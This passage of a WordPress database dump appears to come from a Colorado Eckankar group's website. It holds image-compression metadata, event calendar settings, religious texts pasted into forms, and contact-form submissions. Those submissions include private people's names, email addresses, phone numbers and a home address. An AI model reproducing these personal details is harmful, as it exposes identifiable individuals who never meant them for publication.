smush-complete','1'),(146456,265557,'smush-info','The file was compressed from 43.45 KB to 37.84 KB saving 12.9 percent using WP-Optimize'),(146457,265557,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:44490;s:12:\"smushed-size\";i:38751;s:15:\"savings-percent\";d:12.9000000000000003552713678800500929355621337890625;}'),(146458,265588,'original-file','2021/09/heart-in-hand-2-updraft-pre-smush-original.jpg'),(146459,265588,'smush-complete','1'),(146460,265588,'smush-info','The file was compressed from 20.95 KB to 20.34 KB saving 2.94 percent using WP-Optimize'),(146461,265588,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:21456;s:12:\"smushed-size\";i:20825;s:15:\"savings-percent\";d:2.939999999999999946709294817992486059665679931640625;}'),(146462,265590,'_field_133','Reid'),(146463,265590,'_field_134','Heassler'),(146464,265590,'_field_135','jartzchongrh@live.com'),(146465,265590,'_field_137','add to state newsletter for chelas'),(146466,265590,'_field_138','Hi,\nThis is Diane Conrad.  Reid Heassler says he is not getting the state newsletter.  You may have him on the list, but he usually calls me for information.  I also send him our So CO newsletter, but he often doesn\'t see it so I have to resend it to him.  Please check your email list to see if he is on your mailing list:  jartzchongrh@live.com and add him if he isn\'t.  He has given me permission (on the phone) to contact you.  \n\nThank you,\nDiane Conrad\nColo Spgs.  '),(146467,265590,'_form_id','13'),(146468,265590,'_seq_num','83'),(146475,265591,'mec_currency','a:0:{}'),(146476,265591,'mec_additional_organizer_ids','a:0:{}'),(146477,265591,'mec_additional_location_ids','a:0:{}'),(146478,265591,'mec_cost',''),(146479,265591,'mec_more_info_target','_self'),(146480,265591,'mec_more_info_title',''),(146481,265591,'mec_organizer_id','1'),(146482,265591,'mec_read_more',''),(146483,265591,'mec_more_info',''),(146484,265591,'mec_repeat_type',''),(146485,265591,'mec_repeat_status','0'),(146486,265591,'mec_end_day_seconds','57600'),(146487,265591,'mec_end_time_ampm','PM'),(146488,265591,'mec_end_time_minutes','0'),(146489,265591,'mec_end_time_hour','4'),(146490,265591,'mec_end_date','2021-09-20'),(146491,265591,'mec_start_day_seconds','54000'),(146492,265591,'mec_start_time_ampm','PM'),(146493,265591,'mec_start_time_minutes','0'),(146494,265591,'mec_public','1'),(146495,265591,'mec_start_date','2021-09-20'),(146496,265591,'mec_start_time_hour','3'),(146497,265591,'mec_countdown_method','global'),(146498,265591,'mec_timezone','global'),(146499,265591,'mec_comment',''),(146500,265591,'one_occurrence','0'),(146501,265591,'mec_hide_time','0'),(146502,265591,'mec_hide_end_time','0'),(146503,265591,'mec_event_status','EventScheduled'),(146504,265591,'mec_fields','a:0:{}'),(146505,265591,'mec_op','a:0:{}'),(146506,265591,'mec_bfixed_fields','a:0:{}'),(146507,265591,'mec_reg_fields','a:0:{}'),(146508,265591,'mec_reg_fields_global_inheritance','1'),(146509,265591,'mec_ticket_variations','a:0:{}'),(146510,265591,'mec_ticket_variations_global_inheritance','1'),(146511,265591,'mec_fees','a:0:{}'),(146512,265591,'mec_booking','a:0:{}'),(146513,265591,'mec_tickets','a:0:{}'),(146514,265591,'mec_fees_global_inheritance','1'),(146515,265591,'mec_hourly_schedules','a:0:{}'),(146516,265591,'mec_not_in_days',''),(146517,265591,'mec_in_days',''),(146518,265591,'mec_repeat_end_at_date',''),(146519,265591,'mec_advanced_days','a:0:{}'),(146520,265591,'passster_protection_type','password'),(146521,265591,'passster_activate_global_protection',NULL),(146522,265591,'passster_activate_protection',NULL),(146523,265591,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146524,265591,'mec_repeat_end_at_occurrences',''),(146525,265591,'mec_repeat_end',''),(146526,265591,'mec_repeat_interval','1'),(146527,265591,'mec_allday','0'),(146528,265591,'mec_certain_weekdays','a:0:{}'),(146529,265591,'mec_dont_show_map','0'),(146530,265591,'mec_location_id','118'),(146531,265591,'mec_color',''),(146532,265591,'protect_children',''),(146533,265591,'_edit_lock','1631749952:2'),(146534,265591,'_edit_last','2'),(146535,265591,'_thumbnail_id','265592'),(146536,265592,'_wp_attached_file','2021/09/sunset-grass.jpg'),(146537,265592,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:478;s:6:\"height\";i:269;s:4:\"file\";s:24:\"2021/09/sunset-grass.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"sunset-grass-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"sunset-grass-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:24:\"sunset-grass-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:24:\"sunset-grass-474x269.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:24:\"sunset-grass-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:24:\"sunset-grass-300x269.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:269;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:24:\"sunset-grass-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(146538,265592,'original-file','2021/09/sunset-grass-updraft-pre-smush-original.jpg'),(146539,265592,'smush-complete','1'),(146540,265592,'smush-info','The file was compressed from 34.85 KB to 33.63 KB saving 3.48 percent using WP-Optimize'),(146541,265592,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:35682;s:12:\"smushed-size\";i:34440;s:15:\"savings-percent\";d:3.479999999999999982236431605997495353221893310546875;}'),(146542,265594,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-09-27\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-09-27\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(146543,265594,'boldgrid_hide_page_title','0'),(146544,265594,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(146545,265594,'mec_display_cancellation_reason_in_single_page',''),(146546,265594,'mec_cancelled_reason',''),(146547,265594,'mec_moved_online_link',''),(146548,265594,'mec_currency','a:0:{}'),(146549,265594,'mec_additional_organizer_ids','a:0:{}'),(146550,265594,'mec_additional_location_ids','a:0:{}'),(146551,265594,'mec_cost',''),(146552,265594,'mec_more_info_target','_self'),(146553,265594,'mec_more_info_title',''),(146554,265594,'mec_organizer_id','1'),(146555,265594,'mec_read_more',''),(146556,265594,'mec_more_info',''),(146557,265594,'mec_repeat_type',''),(146558,265594,'mec_repeat_status','0'),(146559,265594,'mec_end_day_seconds','72000'),(146560,265594,'mec_end_time_ampm','PM'),(146561,265594,'mec_end_time_minutes','0'),(146562,265594,'mec_end_time_hour','8'),(146563,265594,'mec_end_date','2021-09-27'),(146564,265594,'mec_start_day_seconds','68400'),(146565,265594,'mec_start_time_ampm','PM'),(146566,265594,'mec_start_time_minutes','0'),(146567,265594,'mec_public','1'),(146568,265594,'mec_start_date','2021-09-27'),(146569,265594,'mec_start_time_hour','7'),(146570,265594,'mec_countdown_method','global'),(146571,265594,'mec_timezone','global'),(146572,265594,'mec_comment',''),(146573,265594,'one_occurrence','0'),(146574,265594,'mec_hide_time','0'),(146575,265594,'mec_hide_end_time','0'),(146576,265594,'mec_event_status','EventScheduled'),(146577,265594,'mec_fields','a:0:{}'),(146578,265594,'mec_op','a:0:{}'),(146579,265594,'mec_bfixed_fields','a:0:{}'),(146580,265594,'mec_reg_fields','a:0:{}'),(146581,265594,'mec_reg_fields_global_inheritance','1'),(146582,265594,'mec_ticket_variations','a:0:{}'),(146583,265594,'mec_ticket_variations_global_inheritance','1'),(146584,265594,'mec_fees','a:0:{}'),(146585,265594,'mec_booking','a:0:{}'),(146586,265594,'mec_tickets','a:0:{}'),(146587,265594,'mec_fees_global_inheritance','1'),(146588,265594,'mec_hourly_schedules','a:0:{}'),(146589,265594,'mec_not_in_days',''),(146590,265594,'mec_in_days',''),(146591,265594,'mec_repeat_end_at_date',''),(146592,265594,'mec_advanced_days','a:0:{}'),(146593,265594,'passster_protection_type','password'),(146594,265594,'passster_activate_global_protection',NULL),(146595,265594,'passster_activate_protection',NULL),(146596,265594,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(146597,265594,'mec_repeat_end_at_occurrences',''),(146598,265594,'mec_repeat_end',''),(146599,265594,'mec_repeat_interval','1'),(146600,265594,'mec_allday','0'),(146601,265594,'mec_certain_weekdays','a:0:{}'),(146602,265594,'mec_dont_show_map','0'),(146603,265594,'mec_location_id','118'),(146604,265594,'mec_color',''),(146605,265594,'protect_children',''),(146606,265594,'_edit_lock','1631749942:2'),(146607,265594,'_edit_last','2'),(146608,265594,'_thumbnail_id','265592'),(169145,267186,'mec_start_day_seconds','64800'),(169146,267186,'mec_end_date','2022-09-23'),(169147,267186,'mec_end_time_hour','7'),(169143,267186,'mec_start_time_minutes','0'),(169144,267186,'mec_start_time_ampm','PM'),(169142,267186,'mec_start_time_hour','6'),(169141,267186,'mec_start_date','2022-09-23'),(169138,267186,'mec_location_id','146'),(169139,267186,'mec_dont_show_map','0'),(169140,267186,'mec_organizer_id','1'),(146637,265608,'original-file','2021/09/satsang-reg-bk-3-updraft-pre-smush-original.jpg'),(146638,265608,'smush-complete','1'),(146639,265608,'smush-info','The file was compressed from 99.45 KB to 81.82 KB saving 17.73 percent using WP-Optimize'),(146640,265608,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:101838;s:12:\"smushed-size\";i:83781;s:15:\"savings-percent\";d:17.730000000000000426325641456060111522674560546875;}'),(146633,265608,'_wp_attached_file','2021/09/satsang-reg-bk-3.jpg'),(146634,265608,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:28:\"2021/09/satsang-reg-bk-3.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"satsang-reg-bk-3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"satsang-reg-bk-3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"satsang-reg-bk-3-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(146676,265628,'_field_224','Reid'),(146677,265628,'_field_225','Heassler'),(146678,265628,'_field_226','jartzchongrh@live.com'),(146679,265628,'_field_227','CO'),(146680,265628,'_field_228','US'),(146681,265628,'_field_229','a:2:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(146682,265628,'_form_id','21'),(146683,265628,'_seq_num','132'),(146806,265640,'_field_138','I\'ve heard there are going to be Satsang classes available starting in Nov.  I\'m wondering about times and dates for these classes.  is there a different web site for these?\n\nThanks\nDave'),(146807,265640,'_form_id','13'),(146808,265640,'_seq_num','84'),(146809,265641,'_field_133','ryan'),(146810,265641,'_field_134','obolia'),(146811,265641,'_field_135','ryan.obolia@coratec.com'),(146812,265641,'_field_137','But Now...'),(146813,265641,'_field_138','But Now...\nPastor Ray Stedman\n\nBut now apart from the law the righteousness of God has been made known, to which the Law and the Prophets testify.\nRomans 3:21\n\nThis is what Paul elsewhere calls the glorious gospel of the blessed God (1 Timothy 1:11), the good news that God has to announce to us, which consists of a gift that God gives us — the righteousness of God himself. This word righteousness is highly misunderstood in our day. Often it is associated with behavior. If people are behaving in a right way, we say that they are behaving righteously. But in the book of Romans righteousness does not directly touch on behavior. It is not what you do; it is what you are! That is even more important, because your behavior stems from what you are. The gift Paul is talking about, the gift from God, is that of a righteous standing.\n\nBut the real meaning underlying this word, as understood by us today, is found in the word worth. People everywhere are looking for a sense of worth. Psychologists tell us that this sense of worth is the most essential element in human activity, and that without it you cannot function as a human being. Therefore, whether we know it or not, or describe it in these terms, we are all looking for a sense of worth. But the gospel announces that it is given to us. What other people work all their lives to achieve is handed to us right at the beginning, when we believe in Jesus Christ. According to the gospel, we cannot earn it, but it is given to us.\n\nThere are millions of people today who are openly acknowledging that they need help, and who come looking for help. There are others who never ask, but behind their smiling facades and confident airs, there are insecure hearts and a consciousness of deep self-doubt. This is the basic problem of mankind. This gospel, therefore, is dealing with something tremendously significant. It does not have to do only with what happens when you die. This is one of the reasons why many churches today are half-empty; so many people do not know that self-worth is what the gospel is all about. Far, far deeper than the need to feel that some human being loves us is our need to know that God loves us, and that we are acceptable in his sight, that we have standing and value and worth to him. Something about us, that bit of eternity planted in our hearts by God himself, bears witness to us that this is the ultimate issue. Somehow life can never be satisfying if that question is not settled.\n\nWhat God is offering is a gift of righteousness — his own perfect righteousness, that cannot be improved upon, a perfect value. By faith in Jesus Christ, he gives us a sense of worth and acceptance, and there could be no better news to mankind.\n\nPrayer\nThank you, Father, that you know my deepest need for a sense of worth and that you have provided it for me through the work of Jesus.\n\nLife Application\nHow do we answer the question, \'Who am I?\' Do we gratefully think and live as persons of worth because of God\'s amazing, undeserved gift of His righteousness? Or do we continue to vainly seek worldly affirmation?\n\n'),(146675,265627,'_seq_num','20'),(159673,266548,'_field_138','Where in Bible, Jesus himself claimed to be God or Son of God?\n \nA: This is an important question, but Jesus not only claimed to be God in words, Jesus demonstrated it and accepted worship as God.\n \nJesus’ Own Words That He is God\n \nJesus Himself said He was God in John 8:58. Jesus answered, “before Abraham was born, I am!” The word “I am,” was the divine name of God, used countless times in the Old Testament. This word “YHWH” in Hebrew, is explained as the “personal name” of God in Exodus 3:14-15, 20:5; Isaiah 42:8; 44:6, this personal name of God has been lost to Muslims. Now the Jews either understood Jesus’ communication correctly when they picked up stones to stone Him, or else they misunderstood Jesus’ communication. Jesus could have said “there is a mistake here, you misunderstand me. I do not claim to be God like you say.” However, there is no record of Jesus ever saying there was any mistake. On the contrary, we have records of the apostles, as well as their disciples, reiterating that Jesus is God.\n \nThe Jew’s responded directly to Jesus’ claim in John 10:33: “‘We are not stoning you for any of these’, replied the Jews, ‘but for blasphemy, because you, a mere man, claim to be God.’”\n \nJesus replied to them that\n \n1) Since Scripture called non-divine being “gods” in Psalm 82:6-7, how much more fitting it is it to call the One uniquely set apart as God’s Son.\n \n2) Even if you will not believe Jesus’ words alone, at least consider the miracles to understand that the Father is in Jesus and Jesus is in the Father.\n \nOn other occasions the scribes and Pharisees wanted to stone Jesus because He claimed to be God. Now imagine a godly person being accused, on multiple occasions, of a wicked crime he did not commit. Imagine him barely escaping some times, but every single time, he never denied that he committed the crime. Can you imagine this? - I cannot. Yet that is what some critics think Jesus did for the crime of blasphemy in claiming to be God.\n \nNegative affirmation: Jesus said of the Pharisees, “if you do not believe that I am the One I claim to be, you will indeed die in your sins.” John 8:24b.\n \nPositive affirmation of Thomas: Thomas the disciple called Jesus God in John 20:28. Thomas even went further than that. John 20:28 actually says that Thomas said to Jesus, “My Lord and my God!” Jesus replied to Thomas, “Because you have seen me, you have believed; blessed are those who have not seen and yet have believed.” Jesus has no hint of rebuke toward Thomas. Indeed, the only remotely negative thing Jesus said is that those who have not seen Jesus in person and believe (this about Jesus) are more blessed than those who have seen Jesus and believe this. Now either\n \na) Thomas was wrong, and he sinned by calling Jesus God, and perhaps Jesus sinned by accepting this and not rebuking Thomas, or\n \nb) Jesus was right to affirm what Thomas said.\n \n   Do you agree that either: They were both right, or that Thomas and Jesus were both wrong?\n \nJesus would send His angels in Matthew 13:41, which are the angels of God (Luke 12:8-9; 15:10).\n \nJesus said he would judge the world (Matthew 24:31-46, 25:31-3; John 5:21-22, 27). Yet is God who is coming to judge the world (Psalm 50:1-6; Joel 3:12; Dt 32:35).\n \n   At Jesus’ trial for blasphemy before the Sanhedrin, they could have let him go. All Jesus had to do was say “I am not God, people thinking I was God is a mistake.” Yet Jesus never said that, and the trial continued.\n \n“All that belongs to the Father is mine.” John 16:15a. Now it is easy to understand someone saying “All that belongs to me I give to God”, but Jesus says, “All that belongs to the Father is mine.” I have never heard anyone explain how this could be a true statement and Jesus not be God.\n \n   A non-Christian might wonder if these verses were added much later. However, an ancient Bible manuscript called the Bodmer II papyrii (125-175 A.D.), has preserved John 1:1-6:11; 6:35b-14:26; 14:29-30; 15:2-26; 16:2-4, 6-7; 16:10-20:20; 20:22-23; 20:25-21:9; 21:12,17.\n \nJesus Accepted Worship\n \n   Jesus Himself told Satan that no one should be worshipped and served except God (Matthew 4:10 and Luke 4:8). Yet…\n \nJesus accepted worship. Only God should be worshipped, and Jesus was showing that He was God. In John 9:38 when Jesus spoke to the (formerly) blind man a second time, Jesus asked him “Do you believe in the Son of God?” The man asked who He was. Jesus said “You have both seen Him and it is He who is talking with you.” Then the man said “Lord, I believe!” and he worshipped Him. Jesus affirmed Him for his belief, and criticized the Jews who did not believe. Also note that Jesus did not ask if the man believed in God; Jesus asked the man if He believed in the Son of God.\n \nFrom a leper Jesus accepted worship (Matthew 8:2)\n \nThe women at the tomb worshipped Jesus, clasping his feet, in Matthew 28:9\n \nGod sent the wise men to worship Jesus (Matthew 2:2). Wise men today worship Him too.\n \nThe disciples of Jesus, after Jesus walked on water, worshipped Him in Matthew 14:33. None of the disciples ever heard Jesus say this was wrong.\n \nAfter Jesus rose from the dead, the disciples worshipped Him in Luke 24:52 and Matthew 28:17.\n \nAgainst this, the angel of God refused to allow anyone to worship him (the angel) in Revelation 19:10 and 22:8-9. Likewise, Paul and Barnabas refused worship of themselves in Acts 14:11-16.\n \nEither Jesus sinned in accepting worship, or else He was correct in doing so.\n \nJesus Demonstrated That He was God\n \n   Jesus had authority over demons and Jesus said His miracles spoke for him (John 10:25). The Old Testament prophesied of Jesus. Jesus also said that no one came to the Father except through Him (John 14:6; 6:45; ~8:24) However, many Muslims might agree with these things about Jesus, without it proving that Jesus is God.\n \nJesus made Himself equal with God\n \na) Jesus said we are to honor the Son just as we honor the Father. John 5:23\n \nb) Request for prayer in Jesus’ name. John 14:13-14;15:7\n \nc) The Father and Jesus “own” all in common. John 16:15;17:10.\n \nd) On earth the Father lived in Jesus. John 10:38;14:10-11.\n \ne) On earth Jesus was in the Father. John 10:38;14:11\n \nf) If you really know Jesus, then you know the Father and have seen the Father. John 14:7-9\n \nJesus said, “I and the Father are one” in John 10:30.\n \nJesus had authority, for he said, “You have heard it said, … but I say to you” (Matthew 5:21-22, 78-78)\n \nJesus can meet our needs in a way that only God can. “If any man is thirsty, let Him come to Me and drink” in John 7:37. See also John 4:14.\n \nJesus gave His peace to us; He did not say the Father’s peace in John 14:27.\n \nIn John 6:35 Jesus said He was the bread of life.\n \nJesus said for us to “believe also in Me.” In John 14:1b. Do you believe in Jesus? See also John 11:25.\n \n   Jesus said for all who are weary and heavy-laden to come to Him in Matthew 11:28. This offer is still available today, so come to Jesus.\n \n   The Bodmer 14/15 papyrii, also called p75, was written 175-225 A.D. It contains most of Luke and John. Specifically, it contains Luke 3:18-22; 3:33-4:2; 4:34-5:10; 5:37-6:4; 6:10-7:32; 7:35-39,41-43; 7:46-9:2; 9:4-17:15; 17:19-18:18; 22:4-24:53. It also has John 1:1-11:45; 11:48-57; 12:3-13:1; 13:8-9; 14:8-29; 15:7-8.\n \nJesus Forgave Sins Against God\n \nOnly God can forgive sins, and Jesus forgave sins against God, then Jesus was showing that He was God in Matthew 9:2-6; Mark 2:5-12, and Luke 5:20-23. Jesus first said to the paralytic “Son, your sins are forgiven you.” The scribes said Jesus was speaking blasphemy, because no one can forgive sins but God alone. Jesus did not contradict their statement. He merely asked a question: “Why do you reason about these things in your hearts? Which is easier, to say to the paralytic, ‘your sins are forgiven you,’ or to say, ‘Arise, take up your bed and walk? But that you may know that the Son of Man has power on earth to forgive sins’ - He said to the paralytic, ‘I say to you, arise, take up your bed, and go to your house.’ And immediately the paralytic rose up and did that!\n \nJesus did one of two things:\n \na) Showed He was God by proving His power,\n \nb) Deliberately misled them to believe that He was God when He was not.\n \nThe question for us is that since this is how Jesus taught, do we trust Jesus to follow where He leads or not?\n \n   Now someone might reason that perhaps Jesus was merely pronouncing God’s forgiveness, rather than forgiving sins against God on His own authority. However, note that Jesus said “But that you may know that the Son of Man has power on earth to forgive sins”. So Jesus said it was He who had the power; he was not just announcing.\n \n   In Luke 7:48-50, Jesus also told the woman who anointed His feet “Your sins are forgiven.” Those who sat with Him said, “Who is this who even forgives sins?”\n\n'),(146667,265627,'_field_97','Francis'),(146668,265627,'_field_98','de Geus'),(146669,265627,'_field_99','fdegeus@comcast.net'),(146670,265627,'_field_100','(415) 539-7401'),(146671,265627,'_field_101','Other'),(146672,265627,'_field_104','Spiritual Services Director'),(146673,265627,'_field_105','Hi Gardener,\nYou may recognize my name from a few years ago when we were both serving in Central at the seminars. Good times!\nI am sending you this note because my wife and I have recently moved to Longmont and would love to get more involved locally. My wife (Helaine Reiner) and I are both initiators, and I am also an ESA. \nWe were at the ECK Light and Sound service earlier this month and met the RESA as well as many other chelas. It was a very warm welcome!\nI am open to starting a Satsang here in Longmont, if there is a need, so I thought maybe we can have a conversation about that sometime. \nIn ECK,\n--Francis \n\n\n'),(146674,265627,'_form_id','10'),(146814,265641,'_form_id','13'),(146815,265641,'_seq_num','85'),(147040,265676,'_field_30','Christie'),(147041,265676,'_field_31','Holliday'),(147042,265676,'_field_32','(303) 919-7910'),(147043,265676,'_field_33',''),(147044,265676,'_field_34',' 2685 S Dayton Way #266'),(147045,265676,'_field_35','Denver'),(147046,265676,'_field_36','CO'),(147047,265676,'_field_37','US'),(147048,265676,'_field_39','This is our new address!'),(147049,265676,'_form_id','4'),(147050,265676,'_seq_num','16'),(147051,265677,'protect_children',''),(147052,265677,'_field_30','William'),(147053,265677,'_field_31','Rogers'),(147054,265677,'_field_32','(303) 919-7837'),(147055,265677,'_field_33','wmmrogers@comcast.net'),(147056,265677,'_field_34',' 2685 S Dayton Way #266'),(147057,265677,'_field_35','Denver'),(147058,265677,'_field_36','CO'),(147059,265677,'_field_37','US'),(147060,265677,'_field_39','My new 